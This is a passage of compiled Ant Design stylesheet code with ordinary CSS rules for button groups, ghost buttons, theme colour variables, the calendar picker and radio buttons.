border-left-color: transparent; } .ant-btn-group .ant-btn { border-radius: 0; } .ant-btn-group > .ant-btn:first-child, .ant-btn-group > span:first-child > .ant-btn { margin-left: 0; } .ant-btn-group > .ant-btn:only-child { border-radius: 2px; } .ant-btn-group > span:only-child > .ant-btn { border-radius: 2px; } .ant-btn-group > .ant-btn:first-child:not(:last-child), .ant-btn-group > span:first-child:not(:last-child) > .ant-btn { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-btn-group > .ant-btn:last-child:not(:first-child), .ant-btn-group > span:last-child:not(:first-child) > .ant-btn { border-top-right-radius: 2px; border-bottom-right-radius: 2px; } .ant-btn-group-sm > .ant-btn:only-child { border-radius: 2px; } .ant-btn-group-sm > span:only-child > .ant-btn { border-radius: 2px; } .ant-btn-group-sm > .ant-btn:first-child:not(:last-child), .ant-btn-group-sm > span:first-child:not(:last-child) > .ant-btn { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-btn-group-sm > .ant-btn:last-child:not(:first-child), .ant-btn-group-sm > span:last-child:not(:first-child) > .ant-btn { border-top-right-radius: 2px; border-bottom-right-radius: 2px; } .ant-btn-group > .ant-btn-group { float: left; } .ant-btn-group > .ant-btn-group:not(:first-child):not(:last-child) > .ant-btn { border-radius: 0; } .ant-btn-group > .ant-btn-group:first-child:not(:last-child) > .ant-btn:last-child { padding-right: 8px; border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-btn-group > .ant-btn-group:last-child:not(:first-child) > .ant-btn:first-child { padding-left: 8px; border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-btn-rtl.ant-btn-group .ant-btn + .ant-btn, .ant-btn-rtl.ant-btn + .ant-btn-group, .ant-btn-rtl.ant-btn-group span + .ant-btn, .ant-btn-rtl.ant-btn-group .ant-btn + span, .ant-btn-rtl.ant-btn-group > span + span, .ant-btn-rtl.ant-btn-group + .ant-btn, .ant-btn-rtl.ant-btn-group + .ant-btn-group, .ant-btn-group-rtl.ant-btn-group .ant-btn + .ant-btn, .ant-btn-group-rtl.ant-btn + .ant-btn-group, .ant-btn-group-rtl.ant-btn-group span + .ant-btn, .ant-btn-group-rtl.ant-btn-group .ant-btn + span, .ant-btn-group-rtl.ant-btn-group > span + span, .ant-btn-group-rtl.ant-btn-group + .ant-btn, .ant-btn-group-rtl.ant-btn-group + .ant-btn-group { margin-right: -1px; margin-left: auto; } .ant-btn-group.ant-btn-group-rtl { direction: rtl; } .ant-btn-group-rtl.ant-btn-group > .ant-btn:first-child:not(:last-child), .ant-btn-group-rtl.ant-btn-group > span:first-child:not(:last-child) > .ant-btn { border-radius: 0 2px 2px 0; } .ant-btn-group-rtl.ant-btn-group > .ant-btn:last-child:not(:first-child), .ant-btn-group-rtl.ant-btn-group > span:last-child:not(:first-child) > .ant-btn { border-radius: 2px 0 0 2px; } .ant-btn-group-rtl.ant-btn-group-sm > .ant-btn:first-child:not(:last-child), .ant-btn-group-rtl.ant-btn-group-sm > span:first-child:not(:last-child) > .ant-btn { border-radius: 0 2px 2px 0; } .ant-btn-group-rtl.ant-btn-group-sm > .ant-btn:last-child:not(:first-child), .ant-btn-group-rtl.ant-btn-group-sm > span:last-child:not(:first-child) > .ant-btn { border-radius: 2px 0 0 2px; } .ant-btn:focus > span, .ant-btn:active > span { position: relative; } .ant-btn > .anticon + span, .ant-btn > span + .anticon { margin-left: 8px; } .ant-btn.ant-btn-background-ghost { color: #fff; border-color: #fff; } .ant-btn.ant-btn-background-ghost, .ant-btn.ant-btn-background-ghost:hover, .ant-btn.ant-btn-background-ghost:active, .ant-btn.ant-btn-background-ghost:focus { background: transparent; } .ant-btn.ant-btn-background-ghost:hover, .ant-btn.ant-btn-background-ghost:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); } .ant-btn.ant-btn-background-ghost:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); } .ant-btn.ant-btn-background-ghost[disabled] { color: rgba(0, 0, 0, 0.25); background: transparent; border-color: #d9d9d9; } .ant-btn-background-ghost.ant-btn-primary { color: var(--ant-primary-color); border-color: var(--ant-primary-color); text-shadow: none; } .ant-btn-background-ghost.ant-btn-primary > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-primary > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-primary:hover, .ant-btn-background-ghost.ant-btn-primary:focus { color: var(--ant-primary-color-hover); border-color: var(--ant-primary-color-hover); background: transparent; } .ant-btn-background-ghost.ant-btn-primary:hover > a:only-child, .ant-btn-background-ghost.ant-btn-primary:focus > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-primary:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-primary:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-primary:active { color: var(--ant-primary-color-active); border-color: var(--ant-primary-color-active); background: transparent; } .ant-btn-background-ghost.ant-btn-primary:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-primary:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-primary[disabled], .ant-btn-background-ghost.ant-btn-primary[disabled]:hover, .ant-btn-background-ghost.ant-btn-primary[disabled]:focus, .ant-btn-background-ghost.ant-btn-primary[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-background-ghost.ant-btn-primary[disabled] > a:only-child, .ant-btn-background-ghost.ant-btn-primary[disabled]:hover > a:only-child, .ant-btn-background-ghost.ant-btn-primary[disabled]:focus > a:only-child, .ant-btn-background-ghost.ant-btn-primary[disabled]:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-primary[disabled] > a:only-child::after, .ant-btn-background-ghost.ant-btn-primary[disabled]:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-primary[disabled]:focus > a:only-child::after, .ant-btn-background-ghost.ant-btn-primary[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-danger { color: var(--ant-error-color); border-color: var(--ant-error-color); text-shadow: none; } .ant-btn-background-ghost.ant-btn-danger > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-danger > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-danger:hover, .ant-btn-background-ghost.ant-btn-danger:focus { color: var(--ant-error-color-hover); border-color: var(--ant-error-color-hover); background: transparent; } .ant-btn-background-ghost.ant-btn-danger:hover > a:only-child, .ant-btn-background-ghost.ant-btn-danger:focus > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-danger:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-danger:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-danger:active { color: var(--ant-error-color-active); border-color: var(--ant-error-color-active); background: transparent; } .ant-btn-background-ghost.ant-btn-danger:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-danger:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-danger[disabled], .ant-btn-background-ghost.ant-btn-danger[disabled]:hover, .ant-btn-background-ghost.ant-btn-danger[disabled]:focus, .ant-btn-background-ghost.ant-btn-danger[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-background-ghost.ant-btn-danger[disabled] > a:only-child, .ant-btn-background-ghost.ant-btn-danger[disabled]:hover > a:only-child, .ant-btn-background-ghost.ant-btn-danger[disabled]:focus > a:only-child, .ant-btn-background-ghost.ant-btn-danger[disabled]:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-danger[disabled] > a:only-child::after, .ant-btn-background-ghost.ant-btn-danger[disabled]:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-danger[disabled]:focus > a:only-child::after, .ant-btn-background-ghost.ant-btn-danger[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous { color: var(--ant-error-color); border-color: var(--ant-error-color); text-shadow: none; } .ant-btn-background-ghost.ant-btn-dangerous > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous:hover, .ant-btn-background-ghost.ant-btn-dangerous:focus { color: var(--ant-error-color-hover); border-color: var(--ant-error-color-hover); background: transparent; } .ant-btn-background-ghost.ant-btn-dangerous:hover > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous:focus > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous:active { color: var(--ant-error-color-active); border-color: var(--ant-error-color-active); background: transparent; } .ant-btn-background-ghost.ant-btn-dangerous:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous[disabled], .ant-btn-background-ghost.ant-btn-dangerous[disabled]:hover, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:focus, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-background-ghost.ant-btn-dangerous[disabled] > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:hover > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:focus > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous[disabled] > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:focus > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link { color: var(--ant-error-color); border-color: transparent; text-shadow: none; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:hover, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:focus { color: var(--ant-error-color-active); border-color: transparent; background: transparent; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:hover > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:focus > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:focus > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:active { color: var(--ant-error-color-active); border-color: transparent; background: transparent; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled], .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:hover, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:focus, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:active { color: rgba(0, 0, 0, 0.25); border-color: #d9d9d9; background: #f5f5f5; text-shadow: none; box-shadow: none; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled] > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child { color: currentColor; } .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled] > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:hover > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:focus > a:only-child::after, .ant-btn-background-ghost.ant-btn-dangerous.ant-btn-link[disabled]:active > a:only-child::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; content: ''; } .ant-btn-two-chinese-chars::first-letter { letter-spacing: 0.34em; } .ant-btn-two-chinese-chars > *:not(.anticon) { margin-right: -0.34em; letter-spacing: 0.34em; } .ant-btn-block { width: 100%; } .ant-btn:empty { display: inline-block; width: 0; visibility: hidden; content: '\a0'; } a.ant-btn { padding-top: 0.01px !important; line-height: 30px; } a.ant-btn-lg { line-height: 38px; } a.ant-btn-sm { line-height: 22px; } .ant-btn-rtl { direction: rtl; } .ant-btn-group-rtl.ant-btn-group .ant-btn-primary:last-child:not(:first-child), .ant-btn-group-rtl.ant-btn-group .ant-btn-primary + .ant-btn-primary { border-right-color: var(--ant-primary-5); border-left-color: #d9d9d9; } .ant-btn-group-rtl.ant-btn-group .ant-btn-primary:last-child:not(:first-child)[disabled], .ant-btn-group-rtl.ant-btn-group .ant-btn-primary + .ant-btn-primary[disabled] { border-right-color: #d9d9d9; border-left-color: var(--ant-primary-5); } .ant-btn-rtl.ant-btn > .ant-btn-loading-icon .anticon { padding-right: 0; padding-left: 8px; } .ant-btn > .ant-btn-loading-icon:only-child .anticon { padding-right: 0; padding-left: 0; } .ant-btn-rtl.ant-btn > .anticon + span, .ant-btn-rtl.ant-btn > span + .anticon { margin-right: 8px; margin-left: 0; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-picker-calendar { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; background: #fff; } .ant-picker-calendar-header { display: flex; justify-content: flex-end; padding: 12px 0; } .ant-picker-calendar-header .ant-picker-calendar-year-select { min-width: 80px; } .ant-picker-calendar-header .ant-picker-calendar-month-select { min-width: 70px; margin-left: 8px; } .ant-picker-calendar-header .ant-picker-calendar-mode-switch { margin-left: 8px; } .ant-picker-calendar .ant-picker-panel { background: #fff; border: 0; border-top: 1px solid #f0f0f0; border-radius: 0; } .ant-picker-calendar .ant-picker-panel .ant-picker-month-panel, .ant-picker-calendar .ant-picker-panel .ant-picker-date-panel { width: auto; } .ant-picker-calendar .ant-picker-panel .ant-picker-body { padding: 8px 0; } .ant-picker-calendar .ant-picker-panel .ant-picker-content { width: 100%; } .ant-picker-calendar-mini { border-radius: 2px; } .ant-picker-calendar-mini .ant-picker-calendar-header { padding-right: 8px; padding-left: 8px; } .ant-picker-calendar-mini .ant-picker-panel { border-radius: 0 0 2px 2px; } .ant-picker-calendar-mini .ant-picker-content { height: 256px; } .ant-picker-calendar-mini .ant-picker-content th { height: auto; padding: 0; line-height: 18px; } .ant-picker-calendar-full .ant-picker-panel { display: block; width: 100%; text-align: right; background: #fff; border: 0; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-body th, .ant-picker-calendar-full .ant-picker-panel .ant-picker-body td { padding: 0; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-body th { height: auto; padding: 0 12px 5px 0; line-height: 18px; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell::before { display: none; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell:hover .ant-picker-calendar-date { background: #f5f5f5; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell .ant-picker-calendar-date-today::before { display: none; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected .ant-picker-calendar-date, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected:hover .ant-picker-calendar-date, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected .ant-picker-calendar-date-today, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected:hover .ant-picker-calendar-date-today { background: var(--ant-primary-1); } .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected .ant-picker-calendar-date .ant-picker-calendar-date-value, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected:hover .ant-picker-calendar-date .ant-picker-calendar-date-value, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected .ant-picker-calendar-date-today .ant-picker-calendar-date-value, .ant-picker-calendar-full .ant-picker-panel .ant-picker-cell-selected:hover .ant-picker-calendar-date-today .ant-picker-calendar-date-value { color: var(--ant-primary-color); } .ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date { display: block; width: auto; height: auto; margin: 0 4px; padding: 4px 8px 0; border: 0; border-top: 2px solid #f0f0f0; border-radius: 0; transition: background 0.3s; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date-value { line-height: 24px; transition: color 0.3s; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date-content { position: static; width: auto; height: 86px; overflow-y: auto; color: rgba(0, 0, 0, 0.85); line-height: 1.5715; text-align: left; } .ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date-today { border-color: var(--ant-primary-color); } .ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date-today .ant-picker-calendar-date-value { color: rgba(0, 0, 0, 0.85); } @media only screen and (max-width: 480px) { .ant-picker-calendar-header { display: block; } .ant-picker-calendar-header .ant-picker-calendar-year-select { width: 50%; } .ant-picker-calendar-header .ant-picker-calendar-month-select { width: calc(50% - 8px); } .ant-picker-calendar-header .ant-picker-calendar-mode-switch { width: 100%; margin-top: 8px; margin-left: 0; } .ant-picker-calendar-header .ant-picker-calendar-mode-switch > label { width: 50%; text-align: center; } } .ant-picker-calendar-rtl { direction: rtl; } .ant-picker-calendar-rtl .ant-picker-calendar-header .ant-picker-calendar-month-select { margin-right: 8px; margin-left: 0; } .ant-picker-calendar-rtl .ant-picker-calendar-header .ant-picker-calendar-mode-switch { margin-right: 8px; margin-left: 0; } .ant-picker-calendar-rtl.ant-picker-calendar-full .ant-picker-panel { text-align: left; } .ant-picker-calendar-rtl.ant-picker-calendar-full .ant-picker-panel .ant-picker-body th { padding: 0 0 5px 12px; } .ant-picker-calendar-rtl.ant-picker-calendar-full .ant-picker-panel .ant-picker-calendar-date-content { text-align: right; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-radio-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; display: inline-block; font-size: 0; } .ant-radio-group .ant-badge-count { z-index: 1; } .ant-radio-group > .ant-badge:not(:first-child) > .ant-radio-button-wrapper { border-left: none; } .ant-radio-wrapper { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-flex; align-items: baseline; margin-right: 8px; cursor: pointer; } .ant-radio-wrapper-disabled { cursor: not-allowed; } .ant-radio-wrapper::after { display: inline-block; width: 0; overflow: hidden; content: '\a0'; } .ant-radio { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; top: 0.2em; display: inline-block; outline: none; cursor: pointer; } .ant-radio-wrapper:hover .ant-radio, .ant-radio:hover .ant-radio-inner, .ant-radio-input:focus + .ant-radio-inner { border-color: var(--ant-primary-color); } .ant-radio-input:focus + .ant-radio-inner { box-shadow: 0 0 0 3px var(--ant-primary-1); } .ant-radio-checked::after { position: absolute; top: 0; left: 0; width: 100%; height: 100%; border: 1px solid var(--ant-primary-color); border-radius: 50%; visibility: hidden; -webkit-animation: antRadioEffect 0.36s ease-in-out; animation: antRadioEffect 0.36s ease-in-out; -webkit-animation-fill-mode: both; animation-fill-mode: both; content: ''; } .ant-radio:hover::after, .ant-radio-wrapper:hover .ant-radio::after { visibility: visible; } .ant-radio-inner { position: relative; top: 0; left: 0; display: block; width: 16px; height: 16px; background-color: #fff; border-color: #d9d9d9; border-style: solid; border-width: 1px; border-radius: 50%; transition: all 0.3s; } .ant-radio-inner::after { position: absolute; top: 50%; left: 50%; display: block; width: 16px; height: 16px; margin-top: -8px; margin-left: -8px; background-color: var(--ant-primary-color); border-top: 0; border-left: 0; border-radius: 16px; transform: scale(0); opacity: 0; transition: all 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86); content: ' '; } .ant-radio-input { position: absolute; top: 0; right: 0; bottom: 0; left: 0; z-index: 1; cursor: pointer; opacity: 0; } .ant-radio-checked .ant-radio-inner { border-color: var(--ant-primary-color); } .ant-radio-checked .ant-radio-inner::after { transform: scale(0.5); opacity: 1; transition: all 0.3s cubic-bezier(0.78, 0.14, 0.15, 0.86); } .ant-radio-disabled { cursor: not-allowed; } .ant-radio-disabled .ant-radio-inner { background-color: #f5f5f5; border-color: #d9d9d9 !important; cursor: not-allowed; } .ant-radio-disabled .ant-radio-inner::after { background-color: rgba(0, 0, 0, 0.2); } .ant-radio-disabled .ant-radio-input { cursor: not-allowed; } .ant-radio-disabled + span { color: rgba(0, 0, 0, 0.25); cursor: not-allowed; } span.ant-radio + * { padding-right: 8px; padding-left: 8px; } .ant-radio-button-wrapper { position: relative; display: inline-block; height: 32px; margin: 0; padding: 0 15px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 30px; background: #fff; border: 1px solid #d9d9d9; border-top-width: 1.02px; border-left-width: 0; cursor: pointer; transition: color 0.3s, background 0.3s, border-color 0.3s, box-shadow 0.3s; } .ant-radio-button-wrapper a { color: rgba(0, 0, 0, 0.85); } .ant-radio-button-wrapper > .ant-radio-button { position: absolute; top: 0; left: 0; z-index: -1; width: 100%; height: 100%; } .ant-radio-group-large .ant-radio-button-wrapper { height: 40px; font-size: 16px; line-height: 38px; } .ant-radio-group-small .ant-radio-button-wrapper { height: 24px; padding: 0 7px; line-height: 22px; } .ant-radio-button-wrapper:not(:first-child)::before { position: absolute; top: -1px; left: -1px; display: block; box-sizing: content-box; width: 1px; height: 100%; padding: 1px 0; background-color: #d9d9d9; transition: background-color 0.3s; content: ''; } .ant-radio-button-wrapper:first-child { border-left: 1px solid #d9d9d9; border-radius: 2px 0 0 2px; } .ant-radio-button-wrapper:last-child { border-radius: 0 2px 2px 0; } .ant-radio-button-wrapper:first-child:last-child { border-radius: 2px; } .ant-radio-button-wrapper:hover { position: relative; color: var(--ant-primary-color); } .ant-radio-button-wrapper:focus-within { box-shadow: 0 0 0 3px var(--ant-primary-1); } .ant-radio-button-wrapper .ant-radio-inner, .ant-radio-button-wrapper input[type='checkbox'], .ant-radio-button-wrapper input[type='radio'] { width: 0; height: 0; opacity: 0; pointer-events: none; } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled) { z-index: 1; color: var(--ant-primary-color); background: #fff; border-color: var(--ant-primary-color); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled)::before { background-color: var(--ant-primary-color); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):first-child { border-color: var(--ant-primary-color); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):hover { color: var(--ant-primary-5); border-color: var(--ant-primary-5); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):hover::before { background-color: var(--ant-primary-5); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):active { color: var(--ant-primary-7); border-color: var(--ant-primary-7); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):active::before { background-color: var(--ant-primary-7); } .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):focus-within { box-shadow: 0 0 0 3px var(--ant-primary-1); } .ant-radio-group-solid .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled) { color: #fff; background: var(--ant-primary-color); border-color: var(--ant-primary-color); } .ant-radio-group-solid .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):hover { color: #fff; background: var(--ant-primary-5); border-color: var(--ant-primary-5); } .ant-radio-group-solid .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):active { color: #fff; background: var(--ant-primary-7); border-color: var(--ant-primary-7); } .ant-radio-group-solid .ant-radio-button-wrapper-checked:not(.ant-radio-button-wrapper-disabled):focus-within { box-shadow: 0 0 0 3px var(--ant-primary-1); } .ant-radio-button-wrapper-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; cursor: not-allowed; } .ant-radio-button-wrapper-disabled:first-child, .ant-radio-button-wrapper-disabled:hover { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; } .ant-radio-button-wrapper-disabled:first-child { border-left-color: #d9d9d9; } .ant-radio-button-wrapper-disabled.ant-radio-button-wrapper-checked { color: rgba(0, 0, 0, 0.25); background-color: #e6e6e6; border-color: 